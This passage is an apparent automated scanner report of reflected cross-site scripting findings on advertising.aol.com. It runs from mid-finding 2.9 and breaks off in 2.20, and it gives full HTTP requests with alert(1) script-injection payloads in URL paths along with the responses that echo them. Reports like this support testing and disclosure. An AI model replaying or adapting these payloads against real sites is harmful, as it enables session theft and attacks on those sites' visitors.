Date: Sun, 13 Nov 2011 18:54:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=4d3c918048ba8e88d0cd8c36eedf3270; expires=Tue, 06 Dec 2011 22:28:19 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/309cf"><script>alert(1)</script>ce1261c57ba/3/4/1/" />
...[SNIP]...

2.9. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 269c4"><script>alert(1)</script>57dcda63b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /269c4"><script>alert(1)</script>57dcda63b74/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=6417729a55d2f605924d094fcea25028; expires=Tue, 06 Dec 2011 22:27:50 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/269c4"><script>alert(1)</script>57dcda63b74/4/4/1/" />
...[SNIP]...

2.10. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8a2b"-alert(1)-"36515da7e8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e8a2b"-alert(1)-"36515da7e8d/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=5180c6353b7994050fc322fae1589222; expires=Tue, 06 Dec 2011 22:27:53 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e8a2b"-alert(1)-"36515da7e8d/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.11. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137f6"><script>alert(1)</script>2b26f6077ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /137f6"><script>alert(1)</script>2b26f6077ab/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8e4db8d94d8e54e3dd9ae2cee61d96a7; expires=Tue, 06 Dec 2011 22:28:02 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/137f6"><script>alert(1)</script>2b26f6077ab/5/4/1/" />
...[SNIP]...

2.12. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4e94"-alert(1)-"8742c7f3959 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a4e94"-alert(1)-"8742c7f3959/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=2a84fa264d87f3eec104a9dcec03838f; expires=Tue, 06 Dec 2011 22:28:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a4e94"-alert(1)-"8742c7f3959/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.13. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c8cd"-alert(1)-"d6b7fae93f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9c8cd"-alert(1)-"d6b7fae93f0/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=2578d839566422d0ceb98284f0b8701b; expires=Tue, 06 Dec 2011 22:28:08 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/9c8cd"-alert(1)-"d6b7fae93f0/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.14. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f003"><script>alert(1)</script>bef976019ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2f003"><script>alert(1)</script>bef976019ec/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=e080afb180b34386590e315864e2f560; expires=Tue, 06 Dec 2011 22:28:03 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/2f003"><script>alert(1)</script>bef976019ec/6/4/1/" />
...[SNIP]...

2.15. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f68d2"><script>alert(1)</script>3ec9975005a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f68d2"><script>alert(1)</script>3ec9975005a/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=6e0e8c96de23aaca7a4bf4270dcc14bc; expires=Tue, 06 Dec 2011 22:28:05 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f68d2"><script>alert(1)</script>3ec9975005a/7/4/1/" />
...[SNIP]...

2.16. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e847b"-alert(1)-"bd748eef3d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e847b"-alert(1)-"bd748eef3d0/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=65bc959492c0a918cbaf43bda0a03ff0; expires=Tue, 06 Dec 2011 22:28:11 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e847b"-alert(1)-"bd748eef3d0/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.17. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6404e"-alert(1)-"93737135027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6404e"-alert(1)-"93737135027/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=8527fc67b92f9123020255701e836a3c; expires=Tue, 06 Dec 2011 22:28:23 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6404e"-alert(1)-"93737135027/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.aol
...[SNIP]...

2.18. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7211"><script>alert(1)</script>3ac8124a12b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f7211"><script>alert(1)</script>3ac8124a12b/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:54:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=3d396d2d1285760bc666bc2da1d1c72e; expires=Tue, 06 Dec 2011 22:28:16 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:54:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f7211"><script>alert(1)</script>3ac8124a12b/8/4/1/" />
...[SNIP]...

2.19. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf1e"-alert(1)-"82ed9d48c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai7bf1e"-alert(1)-"82ed9d48c86/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=9df1bac46194c7611bae1709c6fe86df; expires=Tue, 06 Dec 2011 22:25:36 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai7bf1e"-alert(1)-"82ed9d48c86/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,ad
...[SNIP]...

2.20. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab28"><script>alert(1)</script>f1f72490cae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naieab28"><script>alert(1)</script>f1f72490cae/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
